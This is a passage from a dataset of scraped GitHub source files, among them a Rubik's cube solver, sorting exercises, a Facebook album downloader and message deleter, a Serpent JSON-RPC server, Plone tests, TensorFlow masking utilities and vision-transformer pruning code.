face_list.append(c)\r\n\r\n c = get_color(img_ycb, 320 + border_offset, 380 - border_offset, 200 + border_offset, 260 - border_offset)\r\n cv2.rectangle(img, (630, 10), (670, 50), c, -1) # top right\r\n face_list.append(c)\r\n\r\n c = get_color(img_ycb, 200 + border_offset, 260 - border_offset, 260 + border_offset, 320 - border_offset)\r\n cv2.rectangle(img, (550, 50), (590, 90), c, -1) # mid left\r\n face_list.append(c)\r\n\r\n c = get_color(img_ycb, 260 + border_offset, 320 - border_offset, 260 + border_offset, 320 - border_offset)\r\n cv2.rectangle(img, (590, 50), (630, 90), c, -1) # mid mid\r\n face_list.append(c)\r\n\r\n c = get_color(img_ycb, 320 + border_offset, 380 - border_offset, 260 + border_offset, 320 - border_offset)\r\n cv2.rectangle(img, (630, 50), (670, 90), c, -1) # mid right\r\n face_list.append(c)\r\n\r\n c = get_color(img_ycb, 200 + border_offset, 260 - border_offset, 320 + border_offset, 380 - border_offset)\r\n cv2.rectangle(img, (550, 90), (590, 130), c, -1) # bottom left\r\n face_list.append(c)\r\n\r\n c = get_color(img_ycb, 260 + border_offset, 320 - border_offset, 320 + border_offset, 380 - border_offset)\r\n cv2.rectangle(img, (590, 90), (630, 130), c, -1) # bottom mid\r\n face_list.append(c)\r\n\r\n c = get_color(img_ycb, 320 + border_offset, 380 - border_offset, 320 + border_offset, 380 - border_offset)\r\n cv2.rectangle(img, (630, 90), (670, 130), c, -1) # bottom right\r\n face_list.append(c)\r\n\r\n cv2.rectangle(img, (550, 10), (670, 130), (0, 0, 0), 1)\r\n cv2.line(img, (550, 50), (670, 50), (0, 0, 0), 1)\r\n cv2.line(img, (550, 90), (670, 90), (0, 0, 0), 1)\r\n cv2.line(img, (590, 10), (590, 130), (0, 0, 0), 1)\r\n cv2.line(img, (630, 10), (630, 130), (0, 0, 0), 1)\r\n\r\n cv2.imshow(\"video\", img)\r\n if cv2.waitKey(1) == ord('s'):\r\n total_list.append(face_list)\r\n face_count += 1\r\n capture = 1\r\n\r\n elif cv2.waitKey(1) == ord('q'):\r\n cv2.destroyWindow(\"video\")\r\n break\r\n\r\nif face_count == 6:\r\n cv2.destroyAllWindows()\r\n calib_vid.release()\r\n\r\n solution = solve_string(total_list)\r\n draw(total_list)\r\n move(solution)\r\n","repo_name":"anarc-nita/Rubik-Solver","sub_path":"Rubiks_Main.py","file_name":"Rubiks_Main.py","file_ext":"py","file_size_in_byte":7879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19071880620","text":"def bubble_sort(array:list):\n #[34,532,53,-13,53]\n array_length = len(array)\n for i in reversed(range(array_length)):\n last_unsorted_index = i\n for j in range(last_unsorted_index):\n if array[j] > array[j+1]:\n array[j], array[j+1] = array[j+1], array[j]\n return array\nif __name__ == \"__main__\":\n array = [34,532,53,-13,98]\n sorted_array = bubble_sort(array)\n print(sorted_array)","repo_name":"kailynw/Code-Interview-Study","sub_path":"SortProblems/BubbleSort/interview2.py","file_name":"interview2.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39470933587","text":"def hapus_msg():\n\tgas = Other()\n\tconfirm_execute()\n\tgas.dump_sts_wclass('https://mbasic.facebook.com/messages', True, 'Lihat Pesan Sebelumnya', 0, 'messages/read', href_na=True)\n\techo(\"[+] Total: \" + str(len(gas.id)))\n\tgas.hapus_msg()\n\tprint()\n\techo(\"[+] Done!\")\n\tenter()\n\ndef downloader():\n\ttry: os.mkdir('output')\n\texcept: pass\n\tos.system('clear')\n\tlogo(n=True)\n\tmenu = Menu()\n\tgas = Other()\n\tmenu = menu.m8()\n\tif menu == 0:\n\t\tm = Menu()\n\t\tm.m7()\n\telif menu == 1:\n\t\tos.system('clear')\n\t\tlogo(n=True)\n\t\techo(\"[+] Select Your Album To Download\")\n\t\tgas.tampilkan_album()\n\t\ttempat = gas.album.split(\"/\")[-2]\n\t\tos.chdir('output')\n\t\ttry: os.mkdir(tempat)\n\t\texcept: pass\n\t\tos.chdir('..')\n\t\tdownload_proces(gas.album, f\"output/{tempat}\")\n\telif menu == 2:\n\t\turl = str(input(\" [?] Album Url (use mbasic fb): \"))\n\t\tif not 'mbasic.facebook.com' in url:\n\t\t\techo(\"[+] Url Not Valid\")\n\t\t\tenter()\n\t\telif not 'https://' in url or 'http://' in url:\n\t\t\techo(\"[+] Url Not Valid\")\n\t\t\tenter()\n\t\tdata = gas.o_url(url)\n\t\tnama = str(parser(data, 'html.parser').find('title')).replace('', '').replace('', '')\n\t\tif 'Konten Tidak Ditemukan' == nama:\n\t\t\techo(\"[+] Album Not Found\")\n\t\t\tenter()\n\t\techo(\"[+] Album Name: \" + nama)\n\t\ttempat = url.split(\"/\")[-2]\n\t\tos.chdir('output')\n\t\ttry: os.mkdir(tempat)\n\t\texcept: pass\n\t\tos.chdir('..')\n\t\tdownload_proces(url, f\"output/{tempat}\")\n\t\t\n\telse:\n\t\tdownloader()\n\t\t\n\ndef download_proces(url, path):\n\tgas = Other()\n\tgas.dump_sts_wclass(url, True, 'Lihat Foto Lainnya', 0, None, href_na=True, filter=False)\n\tgas.id = filter(lambda x: \"photo.php?\" in x or \"photos\" in x, gas.id)\n\tgas.id = list(gas.id)\n\techo(\"[+] Total: \" + str(len(gas.id)))\n\t#print(gas.id)\n\tgas.download(path)\n\tprint()\n\techo(f\"[+] Done! photos saved in {path}\")\n\tenter()\n\t\t","repo_name":"THEPutra0/TAFA","sub_path":"menu/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"26761019840","text":"from http.server import BaseHTTPRequestHandler\nimport socket\nimport json\nimport serpent\nimport codecs\nfrom collections import namedtuple\nfrom typing import Callable, Tuple\n\nRPCError = namedtuple('RPCError', 'json code')\nPARSE_ERROR = RPCError(\n json={'code': -32700, 'message': 'Parse error'},\n code=500\n)\nINVALID_REQUEST = RPCError(\n json={'code': -32600, 'message': 'Invalid Request'},\n code=400\n)\nMETHOD_NOT_FOUND = RPCError(\n json={'code': -32601, 'message': 'Method not found'},\n code=404\n)\nINVALID_PARAMS = RPCError(\n json={'code': -32602, 'message': 'Invalid params'},\n code=500\n)\nINTERNAL_ERROR = RPCError(\n json={'code': -32603, 'message': 'Internal error'},\n code=500\n)\n_hex = codecs.getencoder('hex') # type: Callable[[bytes], Tuple[bytes, int]]\nMAX_PAYLOAD_SIZE = 1 << 20\n\n\nclass JSONRPCHandler(BaseHTTPRequestHandler):\n\n def do_POST(self):\n if self.path != '/api':\n self.send_error(404)\n content_type = self.headers['Content-Type']\n if content_type == 'application/json':\n self._process_jsonrpc()\n else:\n self.send_error(415)\n\n def _process_jsonrpc(self):\n length = self.headers['Content-Length']\n if length is None:\n return self.send_error(411)\n length = int(length)\n if length > MAX_PAYLOAD_SIZE:\n return self.send_error(413)\n\n try:\n payload = self.rfile.read(int(length)) # type: bytes\n except socket.timeout:\n return self.send_error(408)\n\n response = {'jsonrpc': '2.0', 'id': None}\n try:\n request = json.loads(payload.decode('utf8'))\n except json.JSONDecodeError:\n response.update(PARSE_ERROR.json)\n return self._send_json(PARSE_ERROR.code, response)\n\n response.update(request.get('id'))\n\n method = request.get('method')\n params = request.get('params')\n version = request.get('jsonrpc')\n if method is None or params is None or version != '2.0':\n response.update(INVALID_REQUEST.json)\n return self._send_json(INVALID_REQUEST.code, response)\n\n try:\n serpent_func = getattr(serpent, method)\n except AttributeError:\n response.update(METHOD_NOT_FOUND.json)\n return self._send_json(METHOD_NOT_FOUND.code, response)\n\n try:\n if isinstance(params, list):\n result = serpent_func(*params)\n elif isinstance(params, dict):\n result = serpent_func(**params)\n else:\n raise TypeError\n except (TypeError, ValueError):\n response.update(INVALID_PARAMS.json)\n return self._send_json(INVALID_PARAMS.code, response)\n\n if method == 'compile': # convert to hex first\n result = '0x' + _hex(result)[0].decode()\n\n response['result'] = result\n self._send_json(200, response)\n\n def _send_json(self, code: int, response: dict):\n encoded = json.dumps(response).encode()\n self.send_response(code)\n self.send_header('Content-Type', 'application/json')\n self.send_header('Content-Length', str(len(encoded)))\n self.end_headers()\n self.wfile.write(encoded)\n","repo_name":"ChrisCalderon/SerpentServer","sub_path":"serpent_server/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9541041237","text":"n=int(input())\ncp=n\ns=0\nfor i in range(n):\n r= n %10\n s= s + (r*r*r)\n n //= 10\nif s == cp:\n print('armstrong')\nelse:\n print('not armstrong')\n","repo_name":"sasikumarJK/test","sub_path":"arms.py","file_name":"arms.py","file_ext":"py","file_size_in_byte":156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12226255730","text":"from plone import api\nfrom plonegovbr.portal_base import PACKAGE_NAME\nfrom zope.schema.vocabulary import SimpleVocabulary\n\nimport pytest\n\n\nclass TestVocabAvailableModalidades:\n name = f\"{PACKAGE_NAME}.vocab.available_modalidades\"\n\n @pytest.fixture(autouse=True)\n def _vocab(self, get_vocabulary, portal):\n self.vocab = get_vocabulary(self.name, portal)\n\n def test_vocabulary(self):\n assert self.vocab is not None\n assert isinstance(self.vocab, SimpleVocabulary)\n\n @pytest.mark.parametrize(\n \"token\",\n [\"tecnico\", \"mestrado\", \"doutorado\"],\n )\n def test_token(self, token):\n assert token in [x for x in self.vocab.by_token]\n\n @pytest.mark.parametrize(\n \"token,title\",\n [\n [\"tecnico\", \"Técnico\"],\n [\"mestrado\", \"Mestrado\"],\n [\"doutorado\", \"Doutorado\"],\n ],\n )\n def test_token_title(self, token, title):\n term = self.vocab.getTerm(token)\n assert title == term.title\n\n\nclass TestVocabModalidades:\n name = f\"{PACKAGE_NAME}.vocab.modalidades\"\n\n @pytest.fixture(autouse=True)\n def _init(self, get_vocabulary, portal, cursos):\n self.portal = portal\n for curso_uid in cursos:\n obj = api.content.find(UID=curso_uid)[0].getObject()\n obj.reindexObject()\n self.vocab = get_vocabulary(self.name, portal)\n\n def test_vocabulary(self):\n assert self.vocab is not None\n assert isinstance(self.vocab, SimpleVocabulary)\n\n @pytest.mark.parametrize(\n \"token\",\n [\"tecnico\", \"mestrado\"],\n )\n def test_token(self, token):\n assert token in [x for x in self.vocab.by_token]\n\n @pytest.mark.parametrize(\n \"token\",\n [\n \"doutorado\",\n ],\n )\n def test_token_not_in(self, token):\n assert token not in [x for x in self.vocab.by_token]\n\n @pytest.mark.parametrize(\n \"token,title\",\n [\n [\"tecnico\", \"Técnico\"],\n [\"mestrado\", \"Mestrado\"],\n ],\n )\n def test_token_title(self, token, title):\n term = self.vocab.getTerm(token)\n assert title == term.title\n\n def test_qs(self):\n \"\"\"Test qs.\"\"\"\n querybuilder = api.content.get_view(\"querybuilderresults\", context=self.portal)\n query = [\n {\n \"i\": \"modalidades\",\n \"o\": \"plone.app.querystring.operation.selection.any\",\n \"v\": [\"mestrado\"],\n }\n ]\n results = querybuilder(query=query)\n assert len(results) == 1\n","repo_name":"plonegovbr/plonegovbr.portal_base","sub_path":"tests/vocabularies/test_vocab_modalidades.py","file_name":"test_vocab_modalidades.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"30838389853","text":"# encoding:utf-8\n# Last modified at 2022.08.23\n# Authored by chaofeng.gcf\n# ========================================================================\n\n\"\"\"Mask api for tensorflow models.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.ops import lookup_ops\nfrom tensorflow.python.ops import string_ops\nfrom tensorflow.python.ops import gen_string_ops\nfrom tensorflow.python.ops import clip_ops\nfrom tensorflow.python.ops import sparse_ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import gen_parsing_ops\n\nclass GenMask:\n \"\"\"Tool class for MCT model\n \"\"\"\n\n def __init__(self, tower_conf_path, max_batch_size=512, max_conv=3, use_weight=False):\n \"\"\"Init function \n Arguments:\n tower_conf_path: Path of tower configuration\n max_batch_size: max batch size during training or testing\n max_conv: max convs in conv_info\n Raises:\n ValueError: If convert type is not unique\n \"\"\"\n if not os.path.exists(tower_conf_path):\n raise ValueError('tower conf file not detected.')\n \n # read configuration\n tower_name_set = set()\n tower_dict = {}\n with open(tower_conf_path, 'rt') as f:\n for line in f:\n line = line.strip()\n if line.startswith('#') or line == '':\n continue\n convert_type, tower_name = line.split(':')\n if convert_type in tower_dict:\n raise ValueError('convert type repeated: [%s]' % convert_type)\n tower_dict[convert_type] = tower_name.split(',')\n for i in tower_name.split(','):\n tower_name_set.add(i)\n\n # generate hashtable\n one_hot_matrix = np.eye(len(tower_name_set), dtype=int)\n default_val = \"|\".join([\"0\"] * len(tower_name_set))\n tower_name_list = sorted(list(tower_name_set), key=lambda x: int(x[1:]))\n tower_index = dict(zip(tower_name_list, range(len(tower_name_list))))\n keys, values = [], []\n for key, value in tower_dict.items():\n keys.append(key)\n convert_mask = np.sum(one_hot_matrix[np.array([tower_index[tower] for tower in value])], 0)\n values.append(\"|\".join(map(str, list(convert_mask))))\n keys_tensor = constant_op.constant(keys)\n values_tensor = constant_op.constant(values, dtypes.string)\n self.mask_table = lookup_ops.HashTable(lookup_ops.KeyValueTensorInitializer(keys, values), default_val)\n\n # global configuration\n self.max_batch = max_batch_size\n self.max_conv = max_conv\n self.tower_num = len(tower_name_set)\n self.use_weight = use_weight\n\n def build(self, sess=None):\n \"\"\" build inner kv dict\n \"\"\"\n self.mask_table.init.run(session=sess)\n\n def eval_mask_label(self, conv_info):\n \"\"\" Returns trituple: mask for train towers, mask for labels, weights for towers\n Arguments:\n conv_info: string, conv_info \n \"\"\"\n mask_convert_type = gen_string_ops.regex_replace(conv_info, \"\\|[0-9\\.]*\", \"\")\n label_convert_type = gen_string_ops.regex_replace(conv_info,\n \",[0-9\\.]*\\|0\\|[0-9\\.]*|[0-9\\.]*\\|0\\|[0-9\\.]*,|[0-9\\.]*\\|0\\|[0-9\\.]*\",\n \"\")\n label_convert_type = gen_string_ops.regex_replace(label_convert_type, \"\\|[0-9\\.]*\", \"\")\n if self.use_weight:\n weight_convert_type = gen_string_ops.regex_replace(conv_info, \"[0-9\\.]*\\|\", \"\")\n return (self._interal_mask(mask_convert_type),\n self._interal_mask(label_convert_type),\n self._interal_weight(mask_convert_type, weight_convert_type))\n else:\n return (self._interal_mask(mask_convert_type), self._interal_mask(label_convert_type), [])\n\n def eval_mask_delay_weight(self, delay_weight):\n \"\"\" Return each tower delay weight, according to each tower mask convert type\n Arguments:\n delay_wight: string;\n example:\n 1|0.1,1000|0.5: convert type:1 -> delay wight:0.1; convert type:1000 -> delay wight:0.5\n \"\"\"\n mask_convert_type = gen_string_ops.regex_replace(delay_weight, \"\\|[0-9\\.]*\", \"\")\n weight_convert_type = gen_string_ops.regex_replace(delay_weight, \"[0-9\\.]*\\|\", \"\")\n return self._interal_weight(mask_convert_type, weight_convert_type)\n\n def _interal_mask(self, convert_type):\n \"\"\" Returns mask from inner kv dict\n Arguments:\n convert_type: array-like, shape `(n_samples, n_convs)`\n \"\"\"\n multi_convert_type = string_ops.string_split(convert_type, \",\")\n sparse_mask = self.mask_table.lookup(multi_convert_type)\n mask_shape = clip_ops.clip_by_value(sparse_mask.dense_shape,\n [1, self.max_conv],\n [self.max_batch, self.max_conv])\n mask_padding = array_ops.reshape(sparse_ops.sparse_to_dense(sparse_mask.indices,\n mask_shape,\n sparse_mask.values,\n \"|\".join(self.tower_num*[\"0\"])), [-1])\n mask_tower_split=string_ops.string_split(mask_padding, \"|\")\n mask = math_ops.reduce_sum(array_ops.reshape(gen_parsing_ops.string_to_number(mask_tower_split.values,\n out_type=dtypes.float32),\n [-1, self.max_conv, self.tower_num]), axis=1)\n return math_ops.cast(math_ops.cast(mask, dtypes.bool), dtypes.float32)\n\n def _interal_weight(self, convert_type, weights):\n \"\"\" returns weight for towers\n arguments:\n weights: array-like, shape `(n_samples, n_convs)`\n \"\"\"\n\n def each_conv_list(sub_convert_info):\n \"\"\" preprocess\n arguments:\n sub_convert_info\n \"\"\"\n multi_info = string_ops.string_split(sub_convert_info, \",\")\n multi_info_shape = clip_ops.clip_by_value(multi_info.dense_shape,\n [1, self.max_conv],\n [self.max_batch, self.max_conv])\n return array_ops.transpose(sparse_ops.sparse_to_dense(multi_info.indices,\n multi_info_shape,\n multi_info.values,\n \"0\"))\n\n convert_type_list, weight_list = each_conv_list(convert_type), each_conv_list(weights)\n return math_ops.reduce_sum([self._interal_mask(convert_type_list[i]) *\n gen_parsing_ops.string_to_number(array_ops.reshape(weight_list[i], [-1, 1]),\n dtypes.float32)\n for i in range(self.max_conv)], axis=0)\n\n","repo_name":"Lyaction/tensorflow_code_analyzer","sub_path":"sandbox/automask/gen_mask.py","file_name":"gen_mask.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72071860004","text":"import numpy as np\nfrom numba import jit\nfrom lib.vanGenuchten_numba import KFun\n\n@jit(nopython=True)\ndef InfiltrationFun(t,qIt,qI,psiT,dz,pars):\n # Upper boundary infiltration flux and runoff\n # Infiltration capacity such that psiT<=0 \n \n # Get Potential infiltration at the current time step\n PotentialInfiltration=np.interp(t,qIt,qI)\n\n # Surface saturation limited (max flux from Darcy's law):\n # Note, KFun always needs an array input, even if only a single item, and \n # always writes output as an array. numba doesn't like zero-D arrays, so\n # when calculating a single value of K, convert to a float afterwards.\n KT=KFun(np.array([psiT]),pars)[0]\n InfiltrationCapacity=-KT*(psiT/dz*2.-1.)\n# Infiltration=InfiltrationCapacity\n \n # Actual infiltration flux:\n Infiltration=min(PotentialInfiltration,InfiltrationCapacity)\n \n return Infiltration\n","repo_name":"amireson/RichardsEquation_improved","sub_path":"lib/InfiltrationFunRunoff.py","file_name":"InfiltrationFunRunoff.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"28037387180","text":"from datetime import datetime, timezone\nimport logging\nimport os\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom main.models import Media\nfrom main.mail import get_email_service\nfrom main.util import notify_admins, update_queryset_archive_state\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = \"Finalizes the restoration of any media files with restoration_requested == True.\"\n\n def handle(self, **options):\n base_qs = Media.objects.filter(\n deleted=False, archive_state=\"to_live\", restoration_requested=True\n )\n # Handle multiviews after all singles because their transition is dependent on the singles'\n # states\n restoration_qs = base_qs.exclude(type__dtype=\"multi\")\n multi_qs = base_qs.filter(type__dtype=\"multi\")\n\n if not (restoration_qs.exists() or multi_qs.exists()):\n logger.info(f\"No media requiring restoration finalization!\")\n return\n\n # Update media ready for restoration\n target_state = {\n \"archive_state\": \"live\",\n \"restoration_requested\": False,\n \"domain\": os.getenv(\"MAIN_HOST\", \"MAIN_HOST\"),\n }\n not_ready = {\"cloned\": {}, \"original\": {}}\n if restoration_qs.exists():\n not_ready = update_queryset_archive_state(restoration_qs, target_state)\n if multi_qs.exists():\n # Return will be empty when operating on all multiviews\n update_queryset_archive_state(multi_qs, target_state)\n\n # Notify owners of blocked restore attempt\n email_service = get_email_service()\n notify_admins(not_ready, email_service)\n","repo_name":"cvisionai/tator","sub_path":"api/main/management/commands/finishrestoration.py","file_name":"finishrestoration.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"11890538352","text":"from bisect import bisect_left\nimport sys\n\nnodes = [] # Array to store created nodes\nPRINT_RES = False\n\n\n# Node class definition\nclass Node(object):\n\n @staticmethod\n def getroot():\n return nodes[-1]\n\n @staticmethod\n def getnodes():\n return nodes\n\n def __init__(self, value):\n self.value = value # Splitting value\n self.left = None # left child\n self.right = None # right child\n nodes.append(self) # automatically append to nodes arrays\n\n # Function to get the value of its rightmost child,\n # will be called on the left child, to get splitting value\n def getrightmost(self):\n if self.right is None:\n return self.value\n else:\n return self.right.getrightmost()\n\n # Function to print the LEAF nodes of a node\n def getleafs(self):\n if self.left:\n self.left.getleafs()\n if self.right:\n self.right.getleafs()\n elif PRINT_RES:\n print(self.value, end=\" \")\n\n\n# Storing numbers in order, like in Task22\ndef add_new_numbers(listA, number):\n i = bisect_left(listA, number)\n listA.insert(i, number)\n\n\n# Function to generate the tree, it recursively calls itself or\n# a version of itself with the next nevel of nodes\n# Return nothing, but creates the tree structure\ndef create_next_level(listA):\n next_level_nodes = [] # Initialise next level nodes as empty\n # Check if the number of nodes on the level is odd,\n # if it is store the last element, and leave it out of the for loop\n if len(listA) % 2 == 1:\n last_element = listA[-1]\n for i in range(0, len(listA)-2, 2): # For every pair of nodes\n next_node = listA[i].getrightmost() # Get the splitting value\n next_node = Node(next_node) # Make it a node\n next_node.left = listA[i] # Connect them\n next_node.right = listA[i+1] # Connect them\n next_level_nodes.append(next_node)\n\n next_level_nodes.append(last_element) # Store the lonely one too\n\n # If there are more than one nodes in the next level,\n # we call \"recursively\"\n if len(next_level_nodes) > 1:\n # But to keep the tree balanced, that is not to jagged,\n # we call the reverse version of create_next_levels\n create_next_level_reverse(next_level_nodes)\n\n else:\n # If number of nodes is even, we do the same,\n # but we need not to leave the last element alone\n for i in range(0, len(listA)-1, 2):\n next_node = listA[i].getrightmost()\n next_node = Node(next_node)\n next_node.left = listA[i]\n next_node.right = listA[i+1]\n next_level_nodes.append(next_node)\n\n if len(next_level_nodes) > 1:\n # Since we have an even number of nodes next,\n # we can call the same function.\n create_next_level(next_level_nodes)\n\n\n# Modified version of create_next_level, it is called,\n# if we have an odd number of nodes in the next level,\n# to keep the tree balanced it will iterate through the nodes backwards\n# Returns nothing, but creates the tree structure\n# I know it is not dry but whatever\ndef create_next_level_reverse(listA):\n next_level_nodes = []\n if len(listA) % 2 == 1:\n last_element = listA[0]\n for i in range(len(listA)-1, 0, -2): # Only difference in for loop\n next_node = listA[i-1].getrightmost()\n next_node = Node(next_node)\n next_node.right = listA[i]\n next_node.left = listA[i-1]\n next_level_nodes.append(next_node)\n\n next_level_nodes.append(last_element)\n next_level_nodes.reverse()\n\n if len(next_level_nodes) > 1:\n # And the function call here, if the next level is odd as well,\n # it calls its reverse, which is the original function\n create_next_level(next_level_nodes)\n\n else:\n for i in range(0, len(listA)-1, 2):\n next_node = listA[i].getrightmost()\n next_node = Node(next_node)\n next_node.left = listA[i]\n next_node.right = listA[i+1]\n next_level_nodes.append(next_node)\n\n if len(next_level_nodes) > 1:\n create_next_level_reverse(next_level_nodes)\n\n\n# Find splitting node, it returns the root of the query\ndef find_split_node(root, start_point, end_point):\n x = root.value\n while (root.right is not None) and (end_point <= x or start_point > x):\n if end_point <= x:\n root = root.left\n else:\n root = root.right\n x = root.value\n return root\n\n\n# Query, implemented as given,\n# it prints the numbers between the end_points, returns nothing\ndef query(root, start_point, end_point, print_res=False):\n global PRINT_RES\n PRINT_RES = print_res\n v_split = find_split_node(root, start_point, end_point)\n # If v_split is a leaf, check if it should be returned\n if v_split.right is None:\n if (v_split.value >= start_point\n and v_split.value <= end_point\n and PRINT_RES):\n print(v_split.value, end=\" \")\n return\n else:\n # If not, look at left subtree\n v = v_split.left\n while v.left is not None:\n if start_point <= v.value:\n v.right.getleafs()\n v = v.left\n else:\n v = v.right\n if (v is not None\n and (v.value >= start_point)\n and (v.value <= end_point)\n and PRINT_RES):\n print(v.value, end=\" \")\n\n # Then at right subtree\n v = v_split.right\n while v.left is not None:\n if end_point >= v.value:\n if v.left:\n v.left.getleafs()\n v = v.right\n else:\n v = v.left\n if (v is not None\n and (v.value >= start_point)\n and (v.value <= end_point)\n and PRINT_RES):\n print(v.value, end=\" \")\n\n return\n\n\nif __name__ == \"__main__\":\n # Initialisation\n list_of_integers = [] # Array for the input numbers\n\n # Read the first line\n first_line = sys.stdin.readline()\n info = [int(i) for i in first_line.strip().split()]\n no_elements, no_queries = info\n\n # Read numbers\n for _ in range(no_elements):\n line = sys.stdin.readline()\n input_integer = int(line.strip())\n add_new_numbers(list_of_integers, input_integer)\n\n # Creating the tree\n # Creating a leaf for each input number\n for element in list_of_integers:\n element = Node(element)\n\n # Then call create_next_level with the leafs,\n # it generates the tree recursively\n create_next_level(nodes)\n # Finaly, the last created node,\n # will be the root of the whole tree, so we store that\n root = Node.getroot()\n\n # Read queries\n for _ in range(no_queries):\n line = sys.stdin.readline()\n input_queries = [int(i) for i in line.strip().split()]\n query(root, input_queries[0], input_queries[1], True)\n if PRINT_RES:\n print(\"\")\n","repo_name":"Vejni/Python-RangeSearch","sub_path":"Scripts/Task21.py","file_name":"Task21.py","file_ext":"py","file_size_in_byte":7208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18174819600","text":"from collections import defaultdict\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\n\nfrom vit_pruning.model import load_model, get_optimizer\nfrom vit_pruning.dataset import get_dataloaders\nfrom vit_pruning.prune_utils import Mask, apply_mask\n\nimport os\n\nTOTAL_EPOCHS = 200\n\ndef val(net, data_loader, device):\n correct_samples = 0\n total_samples = 0\n net.eval()\n with torch.no_grad():\n for (idx, (x, t)) in enumerate(data_loader):\n # for (idx, (x, t)) in tqdm(enumerate(data_loader), desc=\"Validation\"):\n x = net(x.to(device))\n t = t.to(device)\n\n _, indices = torch.max(x, 1)\n correct_samples += torch.sum(indices == t)\n total_samples += t.shape[0]\n\n val_acc = float(correct_samples) / total_samples\n return val_acc\n\ndef prune_iter(trained_model, layers, strategy, ratio, current_mask=None, **kwargs):\n current_mask = Mask.ones_like(trained_model, layers).numpy() if current_mask is None else current_mask.numpy()\n\n # Determine the number of weights that need to be pruned.\n number_of_total_weights = np.sum([v.size for v in current_mask.values()])\n current_sparsity = trained_model.sparsity()\n ratio = ratio - current_sparsity\n number_of_weights_to_prune = np.ceil(\n ratio * number_of_total_weights).astype(int)\n # Get the model weights.\n\n weights = {k: v.clone().cpu().detach().numpy()\n for k, v in trained_model.state_dict().items()\n if k in layers}\n\n new_mask = strategy(weights, Mask(current_mask), number_of_weights_to_prune, **kwargs)\n \n\n device = next(trained_model.parameters()).device\n for k in current_mask:\n if k not in new_mask:\n new_mask[k] = current_mask[k]\n for k in new_mask:\n new_mask[k] = new_mask[k].to(device)\n \n\n return new_mask\n\ndef finetune(net, mask, optimizer, scheduler, data_loader, device, epochs=1, verbose=True, logger=None, initial_accuracy=None):\n if not logger: logger = defaultdict(list)\n net.train()\n for _ in range(TOTAL_EPOCHS - epochs):\n scheduler.step()\n with tqdm(total=len(data_loader) * epochs, desc=\"Finetuning\", disable=not verbose) as pbar:\n for e in range(epochs):\n correct_samples = 0\n total_samples = 0\n epoch_loss = []\n for (idx, (x, t)) in enumerate(data_loader):\n \n apply_mask(net, mask)\n x = net(x.to(device))\n t = t.to(device)\n loss = F.cross_entropy(x, t)\n pbar.set_postfix(loss=loss.item())\n\n optimizer.zero_grad()\n loss.backward()\n epoch_loss.append(loss.item())\n\n with torch.no_grad():\n for name, param in net.named_parameters():\n if name in mask:\n param.grad *= mask[name] \n\n optimizer.step()\n pbar.update()\n\n _, indices = torch.max(x, 1)\n correct_samples += torch.sum(indices == t)\n total_samples += t.shape[0]\n\n scheduler.step()\n\n total_loss = np.mean(epoch_loss)\n\n train_acc = float(correct_samples) / total_samples\n if verbose: print(f'Epoch {(e)} training acc: {(train_acc):.5f}')\n logger['loss'].append(total_loss)\n logger['train_acc'].append(train_acc)\n\n if initial_accuracy is not None and initial_accuracy - train_acc < 0.01:\n break\n\n return logger\n\n# for iterative, directly input the ratios as [0.25, 0.5, ...., 0.975]\n# for oneshot, do a float\ndef pruning(\n ratios, \n strategy, \n num_epochs, \n device, \n initial_mask=None,\n train_loader=None, \n val_loader=None, \n net=None, \n layers=None, \n schedule=None, \n verbose=True, \n random_baseline=False,\n finetuning_on=True,\n track_masks=False,\n experiment_name=None,\n **kwargs\n):\n if not isinstance(ratios, list): ratios = [ratios]\n if not net: net = load_model()\n if not layers: layers = net.get_prunable_layers()\n else: net.set_prunable_layers(layers)\n\n default_loaders = get_dataloaders()\n if not train_loader: train_loader = default_loaders[0]\n if not val_loader: val_loader = default_loaders[1]\n\n prune_mask = initial_mask\n net.to(device)\n\n init_acc = val(net, val_loader, device)\n print(\"Initial val_acc: {:.4f}\".format(init_acc))\n logger = defaultdict(dict)\n initial_accuracy = None \n # uncomment to break after finetune train acc is within 1% of the previous accuracy\n # initial_accuracy = val(net, train_loader, device)\n\n if track_masks:\n mask_tracker = {}\n init_weights = net.state_dict()\n for r in ratios:\n print(\"PRUNING RATIO\", r)\n prune_mask = prune_iter(net, layers, strategy, r, current_mask=prune_mask, **kwargs)\n\n if r == 0.75:\n for k, v in init_weights.items():\n if (v == net.state_dict()[k]).sum() < 5:\n print(k, 'doesnt change much, only ', (v - net.state_dict()[k]).norm())\n\n apply_mask(net, prune_mask)\n \n val_acc = val(net, val_loader, device)\n logger[r]['val_acc/before_finetune'] = val_acc\n if verbose: print('after pruning to {:.4f}: {}'.format(net.sparsity(), val_acc))\n\n if finetuning_on and val_acc < (init_acc - 0.01):\n optimizer, scheduler = 